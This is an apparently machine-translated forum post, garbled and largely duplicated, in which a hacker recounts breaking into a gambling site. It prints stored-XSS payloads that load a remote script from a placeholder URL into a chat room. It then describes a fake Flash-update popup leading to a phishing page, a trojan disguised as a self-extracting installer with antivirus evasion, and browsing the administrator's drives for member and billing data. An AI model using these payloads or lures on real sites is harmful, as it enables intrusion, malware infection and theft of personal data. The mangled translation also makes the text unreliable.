KoreanHackerTeam
Moderator
우리는 좋은 학습 습관을 유지하고 이번에는 일반적으로 배우는 것을 사용해야합니다.
당신은 나에게 그것을 보내는 데 문제가 있다고 말했습니다. 나는 최근에 사임을했고 할 일이 없었다. 봅시다.
그 사람의 친구를 추가 한 후, 나는 몇 가지 상징적으로 채팅을했을 것입니다. 몇 마디 후, 나는 URL 및 초대장 코드를 보냈고 (이 사이트의 초대장 코드없이 등록 할 수 없음) 웹 사이트에서 돈을 재충전하도록 요청했습니다. 나는 예라고 말했습니다. 마스터, 당신은 나를 잘 가져 가서 등록해야합니다 (나중에 돈을 재충전하지 않았기 때문에 그는 계속 흔들어 메시지를 보냈습니다. 나는 짜증이났다.
정보 수집 단계를 통과하기에는 너무 번거 롭습니다. 구름 방패 (WAF+CDN)가 있습니다. 다음 Yunxi 지문 인식 다이어그램을보십시오. 다양한 기능 지점을 테스트하지만 결과는 없습니다. 대부분의 BC 보안이 잘 이루어 졌다고 말해야합니다.
잠시 동안 생각한 후, 나는 대화방 기능을보고 그들이 말하는 것을 보러 갔지만, 몇 명의 사람들만이 앞뒤로 이야기하는 것을 발견했으며 때로는 나와 같은 평범한 회원이 몇 명있었습니다. 나는 이것이 슬로건이라고 생각했다.
1/TextArea'script SRC=XSSURL/스크립트
WDNMD가 응답하지 않았습니까? 그것은로드되었습니다 . 나는 다른 주인들에게 물었고이 상황은 CSP 일 수 있다고 말했습니다. 나는 여기서 그것을 설명하지 않을 것입니다. 나는 원래 포기할 계획 이었지만 IMG가 제한되지 않는 경우에 대해 생각했습니다.
다시 먹어라 :
1img src=x oneerror=s=createElement ( 'script'); body.appendchild (s); s.src='xssurl';
Ding ~ Ding ~ 전화가 울 렸고, 멋진 소리, 페이로드가 성공적으로 실행되었으며, 쿠키 (또는 다른 도메인 이름)가 많았지 만 현실은 잔인합니다. 이 사이트에는 httponly가 있으며 쿠키를 사용할 수 없으며 히스토리 암호는 얻지 못했지만 낙담하지 않으면 더 외설적입니다.
그런 다음 XSS 플랫폼은 모듈을 생성하고 코드를 간략하게 설명하고 시작 부분에서 경고 메소드를 다시 작성하고 URL 디스플레이를 차단하고 플래시 업그레이드 프롬프트를 팝업하고 피싱 페이지로 점프합니다.
자체 압축 된 EXE 파일을 정상적으로 실행하도록하려면 (일반 설치 파일 아이콘으로 변경됨) 압축 압력 소프트웨어가 있는지 확인해야합니다. 나는 낚시 페이지의 자체 방출 파일을 압축하고 FlashPlayerpp_install_cn.zip이되었습니다. 이런 식으로, 그는 감압 된 파일을 설치하여 설치 프로그램을 열어야하며 Ma Zi는 자연스럽게 적용됩니다.
페이지가 성공적으로 나타나고 다른 당사자는 확실한 페이지를 클릭하지 않으면 계속 붙어 있습니다. OK를 클릭 한 후 낚시 페이지가 내 낚시 페이지로 뛰어들 것입니다 (여기 낚시 페이지는 일부 재료를 추가하여 다시 클릭하면 낚시 페이지로 돌아갈 수 있습니다).
그러나 처음에는 아무도 온라인에 없었기 때문에 클릭하여 관리자가 채팅 페이지의 내용을 재설정하는 것을 보았습니다. Oli는 한 번 말했다 : 우리가 겪는 어려움을 두려워하지 마십시오. 숫자를 바꾸고 계속 교차합시다. 간헐적으로 교차하고 교차하는 후 10 번 이상 횡단 한 후 관리자는 그것을 도울 수 없을 수 있습니다 (관리자 : 형제, 재생 중지, 아직 설치할 수 없습니다).
잠시 동안주의를 기울이면 반대쪽은 섹스를합니다.
이것은 분명합니다. 낚시 페이지가 여전히 열려 있음을 알 수 있으며 두 사람은 여전히 돈을 잃는 것에 대해 논의하고 있으며 웃음으로 죽어 가고 있습니다.
나는 책을 열었지만이 흐름을 이해할 수 없습니다.
어떤 좋은 것들이 저장되어 있는지, 두 개의 하드 드라이브 및 1 개의 U 드라이브를 보자. C 드라이브 드라이브는 아무것도 없습니다.
F 디스크에 대한 정보가 있으며, 이는 멤버 데이터, 청구서 흐름, 관리 백엔드 구성 등으로 가득합니다.
故事的起因
며칠 전에 컨텐츠와 함께 이메일을 받았습니다.
당신은 나에게 그것을 보내는 데 문제가 있다고 말했습니다. 나는 최근에 사임을했고 할 일이 없었다. 봅시다.
그 사람의 친구를 추가 한 후, 나는 몇 가지 상징적으로 채팅을했을 것입니다. 몇 마디 후, 나는 URL 및 초대장 코드를 보냈고 (이 사이트의 초대장 코드없이 등록 할 수 없음) 웹 사이트에서 돈을 재충전하도록 요청했습니다. 나는 예라고 말했습니다. 마스터, 당신은 나를 잘 가져 가서 등록해야합니다 (나중에 돈을 재충전하지 않았기 때문에 그는 계속 흔들어 메시지를 보냈습니다. 나는 짜증이났다.
漏洞挖掘
官网截图
정보 수집 단계를 통과하기에는 너무 번거 롭습니다. 구름 방패 (WAF+CDN)가 있습니다. 다음 Yunxi 지문 인식 다이어그램을보십시오. 다양한 기능 지점을 테스트하지만 결과는 없습니다. 대부분의 BC 보안이 잘 이루어 졌다고 말해야합니다.
잠시 동안 생각한 후, 나는 대화방 기능을보고 그들이 말하는 것을 보러 갔지만, 몇 명의 사람들만이 앞뒤로 이야기하는 것을 발견했으며 때로는 나와 같은 평범한 회원이 몇 명있었습니다. 나는 이것이 슬로건이라고 생각했다.
职业习惯:
상자를 볼 때 포크를 만들고 XSS 페이로드로 누르고 싶습니다.1/TextArea'script SRC=XSSURL/스크립트
WDNMD가 응답하지 않았습니까? 그것은로드되었습니다 . 나는 다른 주인들에게 물었고이 상황은 CSP 일 수 있다고 말했습니다. 나는 여기서 그것을 설명하지 않을 것입니다. 나는 원래 포기할 계획 이었지만 IMG가 제한되지 않는 경우에 대해 생각했습니다.
다시 먹어라 :
1img src=x oneerror=s=createElement ( 'script'); body.appendchild (s); s.src='xssurl';
Ding ~ Ding ~ 전화가 울 렸고, 멋진 소리, 페이로드가 성공적으로 실행되었으며, 쿠키 (또는 다른 도메인 이름)가 많았지 만 현실은 잔인합니다. 이 사이트에는 httponly가 있으며 쿠키를 사용할 수 없으며 히스토리 암호는 얻지 못했지만 낙담하지 않으면 더 외설적입니다.
Flash钓鱼
전면 항문이 당신을 움직일 수 없기 때문에 옆으로 가자. 얼마 전, 나는 종종 마스터 우가의 플래시 낚시 작전을 보았습니다. 그런 다음 언젠가는 공식 플래시 웹 사이트의 낚시 소스 코드를 사용할 것이라고 생각했습니다. 나는 그것을 아주 일찍 썼고 그것을 Github : Portal에 넣었습니다.前期准备
여유 공간, 무료 도메인 이름 (도메인 이름은 www.flashxxx.tk로 사용할 수 있으며 신뢰성이 비교적 높음) 및 정상적으로 발사 할 수있는 말을 사용할 수 있습니다.그런 다음 XSS 플랫폼은 모듈을 생성하고 코드를 간략하게 설명하고 시작 부분에서 경고 메소드를 다시 작성하고 URL 디스플레이를 차단하고 플래시 업그레이드 프롬프트를 팝업하고 피싱 페이지로 점프합니다.
关于马子
정상적인 설치 파일, 야만적 인 자세 : 자체 추출 번들 파일 사용자체 압축 된 EXE 파일을 정상적으로 실행하도록하려면 (일반 설치 파일 아이콘으로 변경됨) 압축 압력 소프트웨어가 있는지 확인해야합니다. 나는 낚시 페이지의 자체 방출 파일을 압축하고 FlashPlayerpp_install_cn.zip이되었습니다. 이런 식으로, 그는 감압 된 파일을 설치하여 설치 프로그램을 열어야하며 Ma Zi는 자연스럽게 적용됩니다.
关于免杀
제한된 기술로 인해 우리는 죽이지 않고 그것을하지 않습니다. 생성 된 말은 독에 의해 부분적으로 살해되고보고 될 것입니다. 나는 상대방을 죽일 것인지 모르기 때문에 저속하지만 효과적인 방법을 생각했습니다. 실제로 다운로드 사이트에서 많은 다운로드 파일 도이 작업을 좋아합니다.
一切就绪
모든 것이 준비되었으며 동쪽 바람 만 필요하며 업그레이드 프롬프트 + 점프 XSS 페이로드를 직접 발송합니다.
페이지가 성공적으로 나타나고 다른 당사자는 확실한 페이지를 클릭하지 않으면 계속 붙어 있습니다. OK를 클릭 한 후 낚시 페이지가 내 낚시 페이지로 뛰어들 것입니다 (여기 낚시 페이지는 일부 재료를 추가하여 다시 클릭하면 낚시 페이지로 돌아갈 수 있습니다).
그러나 처음에는 아무도 온라인에 없었기 때문에 클릭하여 관리자가 채팅 페이지의 내용을 재설정하는 것을 보았습니다. Oli는 한 번 말했다 : 우리가 겪는 어려움을 두려워하지 마십시오. 숫자를 바꾸고 계속 교차합시다. 간헐적으로 교차하고 교차하는 후 10 번 이상 횡단 한 후 관리자는 그것을 도울 수 없을 수 있습니다 (관리자 : 형제, 재생 중지, 아직 설치할 수 없습니다).
成功上线:
이곳에서 시작되었지만 다행히도 관리자의 기계였습니다. 그렇지 않으면 이전의 노력은 헛된 것입니다.
잠시 동안주의를 기울이면 반대쪽은 섹스를합니다.
이것은 분명합니다. 낚시 페이지가 여전히 열려 있음을 알 수 있으며 두 사람은 여전히 돈을 잃는 것에 대해 논의하고 있으며 웃음으로 죽어 가고 있습니다.
나는 책을 열었지만이 흐름을 이해할 수 없습니다.
어떤 좋은 것들이 저장되어 있는지, 두 개의 하드 드라이브 및 1 개의 U 드라이브를 보자. C 드라이브 드라이브는 아무것도 없습니다.
F 디스크에 대한 정보가 있으며, 이는 멤버 데이터, 청구서 흐름, 관리 백엔드 구성 등으로 가득합니다.
点到为止:
많이 말하지 않을 것입니다. 나는 온라인 IP를보고 돈을 벌기 위해 꽤 멀리 달렸다. 고향을 떠나는 것은 쉽지 않습니다. 나는 당신에게 새해를 위해 우리 조국의 포옹으로 평화로운 복귀를 기원합니다.